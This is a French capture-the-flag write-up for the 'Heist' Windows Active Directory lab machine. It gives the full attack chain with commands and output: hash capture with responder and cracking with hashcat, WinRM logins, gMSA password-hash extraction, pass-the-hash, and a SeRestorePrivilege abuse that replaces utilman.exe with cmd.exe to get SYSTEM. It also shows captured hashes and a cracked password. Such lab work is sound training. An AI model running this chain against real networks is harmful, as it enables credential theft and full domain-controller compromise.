# Heist
`activie directory` `responder` `gmsapasswordreader` `serestoreprivilege`
* Nom machine : Heist
* Difficulté : Difficile
* OS : Windows AD
## Enumération
### NMAP
```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 05:08 EDT
Nmap scan report for 192.168.196.165
Host is up (0.034s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-03 09:09:02Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-09-03T09:09:44+00:00; +2s from scanner time.
| rdp-ntlm-info:
| Target_Name: HEIST
| NetBIOS_Domain_Name: HEIST
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: heist.offsec
| DNS_Computer_Name: DC01.heist.offsec
| DNS_Tree_Name: heist.offsec
| Product_Version: 10.0.17763
|_ System_Time: 2024-09-03T09:09:04+00:00
| ssl-cert: Subject: commonName=DC01.heist.offsec
| Not valid before: 2024-08-01T02:27:33
|_Not valid after: 2025-01-31T02:27:33
8080/tcp open http Werkzeug httpd 2.0.1 (Python 3.9.0)
|_http-server-header: Werkzeug/2.0.1 Python/3.9.0
|_http-title: Super Secure Web Browser
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
```
### HTTP (8080)
Nous allons utiliser responder pour récupérer un hash NTLMv2
## Local exploitation
```
┌──(kali㉿kali)-[~]
└─$ sudo responder -I tun0
[HTTP] NTLMv2 Client : 192.168.196.165
[HTTP] NTLMv2 Username : HEIST\enox
[HTTP] NTLMv2 Hash : enox::HEIST:7de7b95776227892:A51046D41C44ABD81DB64A88E8CB305A:0101000000000000AF7BC745E1FDDA019639D3C0D5DBF5CC0000000002000800490057004C004A0001001E00570049004E002D004D0037004E005A005700340037004E0053005300480004001400490057004C004A002E004C004F00430041004C0003003400570049004E002D004D0037004E005A005700340037004E005300530048002E00490057004C004A002E004C004F00430041004C0005001400490057004C004A002E004C004F00430041004C000800300030000000000000000000000000300000C4F51C6E9DB9499D59C386C317DB4FE1D9EF380289201E62A8474177A8845FCE0A001000000000000000000000000000000000000900260048005400540050002F003100390032002E003100360038002E00340035002E003200330037000000000000000000
```
Nous allons le cracker.
```
──(kali㉿kali)-[~]
└─$ echo "enox::HEIST:7de7b95776227892:A51046D41C44ABD81DB64A88E8CB305A:0101000000000000AF7BC745E1FDDA019639D3C0D5DBF5CC0000000002000800490057004C004A0001001E00570049004E002D004D0037004E005A005700340037004E0053005300480004001400490057004C004A002E004C004F00430041004C0003003400570049004E002D004D0037004E005A005700340037004E005300530048002E00490057004C004A002E004C004F00430041004C0005001400490057004C004A002E004C004F00430041004C000800300030000000000000000000000000300000C4F51C6E9DB9499D59C386C317DB4FE1D9EF380289201E62A8474177A8845FCE0A001000000000000000000000000000000000000900260048005400540050002F003100390032002E003100360038002E00340035002E003200330037000000000000000000" > hash.txt
┌──(kali㉿kali)-[~]
└─$ hashcat -h | grep NT
5500 | NetNTLMv1 / NetNTLMv1+ESS | Network Protocol
27000 | NetNTLMv1 / NetNTLMv1+ESS (NT) | Network Protocol
5600 | NetNTLMv2 | Network Protocol
27100 | NetNTLMv2 (NT) | Network Protocol
1000 | NTLM | Operating System
┌──(kali㉿kali)-[~]
└─$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-11th Gen Intel(R) Core(TM) i7-11700F @ 2.50GHz, 7852/15768 MB (2048 MB allocatable), 5MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
ENOX::HEIST:7de7b95776227892:a51046d41c44abd81db64a88e8cb305a:0101000000000000af7bc745e1fdda019639d3c0d5dbf5cc0000000002000800490057004c004a0001001e00570049004e002d004d0037004e005a005700340037004e0053005300480004001400490057004c004a002e004c004f00430041004c0003003400570049004e002d004d0037004e005a005700340037004e005300530048002e00490057004c004a002e004c004f00430041004c0005001400490057004c004a002e004c004f00430041004c000800300030000000000000000000000000300000c4f51c6e9db9499d59c386c317db4fe1d9ef380289201e62a8474177a8845fce0a001000000000000000000000000000000000000900260048005400540050002f003100390032002e003100360038002e00340035002e003200330037000000000000000000:california
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: ENOX::HEIST:7de7b95776227892:a51046d41c44abd81db64a...000000
Time.Started.....: Tue Sep 3 05:13:37 2024 (0 secs)
Time.Estimated...: Tue Sep 3 05:13:37 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1359.5 kH/s (1.79ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5120/14344385 (0.04%)
Rejected.........: 0/5120 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> babygrl
Hardware.Mon.#1..: Util: 18%
Started: Tue Sep 3 05:13:36 2024
Stopped: Tue Sep 3 05:13:39 2024
```
`enox:california`
```
┌──(kali㉿kali)-[~/oscp/heist]
└─$ crackmapexec winrm 192.168.196.165 -u user.txt -p pass.txt
SMB 192.168.196.165 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:heist.offsec)
HTTP 192.168.196.165 5985 DC01 [*] http://192.168.196.165:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 192.168.196.165 5985 DC01 [+] heist.offsec\enox:california (Pwn3d!)
```
```
┌──(kali㉿kali)-[~/oscp/heist]
└─$ evil-winrm -i 192.168.196.165 -u enox -p california
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\enox\Documents> whoami
heist\enox
```
## Elévation de privilège
Nous allons essayer de devenir svc\_apache$
```
┌──(kali㉿kali)-[~/oscp/heist]
└─$ bloodhound-python -d heist.offsec -u enox -p california -c all -ns 192.168.196.165
INFO: Found AD domain: heist.offsec
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.heist.offsec:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.heist.offsec
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.heist.offsec
INFO: Found 6 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.heist.offsec
INFO: Done in 00M 07S
```
Dans Shortest Paths To High Value Targets
L'user enox appartient au groupe Web Admin
Clic droit sur la flèche
```
*Evil-WinRM* PS C:\Users\enox\desktop\application> ./gmsapasswordreader.exe --accountname svc_apache$
Calculating hashes for Old Value
[*] Input username : svc_apache$
[*] Input domain : HEIST.OFFSEC
[*] Salt : HEIST.OFFSECsvc_apache$
[*] rc4_hmac : 4FC1682833B24CF2225248D67DF7E618
[*] aes128_cts_hmac_sha1 : 056248716EB814ECEEA9BEF3EC864606
[*] aes256_cts_hmac_sha1 : E5BCF79903496F24EA9D753F1EFC3146701B6ADF88A00B03E9EE73483DD73984
[*] des_cbc_md5 : 4AB398EFD91523CE
Calculating hashes for Current Value
[*] Input username : svc_apache$
[*] Input domain : HEIST.OFFSEC
[*] Salt : HEIST.OFFSECsvc_apache$
[*] rc4_hmac : 31424E5B49C147E64854B47E50AA4C98
[*] aes128_cts_hmac_sha1 : 409F1002404B512AC58B4BEB22013568
[*] aes256_cts_hmac_sha1 : F133616850B2F938715388DFD581398A58C9AF9B45F329710A278EE3E9074395
[*] des_cbc_md5 : 7564AE6407BADCC4
```
rc4\_hmac nous intéresse ici.
```
┌──(kali㉿kali)-[~/oscp/heist]
└─$ evil-winrm -i 192.168.196.165 -u svc_apache$ -H '4FC1682833B24CF2225248D67DF7E618'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_apache$\Documents>
```
Nous sommes bien connecter en tant que svc\_apache$
```
*Evil-WinRM* PS C:\users\svc_apache$\documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeRestorePrivilege Restore files and directories Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
```
`SeRestorePrivilege` est intéressant, intuition confirmé par le contenu du dossier documents.
Nous allons activer le script powershell
```
*Evil-WinRM* PS C:\users\svc_apache$\documents> ./EnableSeRestorePrivilege.ps1
Debug:
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public struct TokPriv1Luid
{
public int Count;
public long Luid;
public int Attr;
}
public static class Advapi32
{
[DllImport("advapi32.dll", SetLastError=true)]
public static extern bool OpenProcessToken(
IntPtr ProcessHandle,
int DesiredAccess,
ref IntPtr TokenHandle);
[DllImport("advapi32.dll", SetLastError=true)]
public static extern bool LookupPrivilegeValue(
string lpSystemName,
string lpName,
ref long lpLuid);
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool AdjustTokenPrivileges(
IntPtr TokenHandle,
bool DisableAllPrivileges,
ref TokPriv1Luid NewState,
int BufferLength,
IntPtr PreviousState,
IntPtr ReturnLength);
}
public static class Kernel32
{
[DllImport("kernel32.dll")]
public static extern uint GetLastError();
}
Debug: Current process handle: 1620
Debug: Calling OpenProcessToken()
Debug: Token handle: 2652
Debug: Calling LookupPrivilegeValue for SeRestorePrivilege
Debug: SeRestorePrivilege LUID value: 18
Debug: Calling AdjustTokenPrivileges
Debug: GetLastError returned: 0
```
Maintenant nous pouvons l'exploiter.
{% embed url="" %}
```
*Evil-WinRM* PS C:\Users\svc_apache$\Documents> mv C:\Windows\System32\utilman.exe C:\Windows\System32\utilman.old
*Evil-WinRM* PS C:\Users\svc_apache$\Documents> mv C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
```
```
┌──(kali㉿kali)-[~/oscp/heist]
└─$ rdesktop 192.168.196.165
```
Appuyer sur Win + u
Nous sommes nt authority \ system !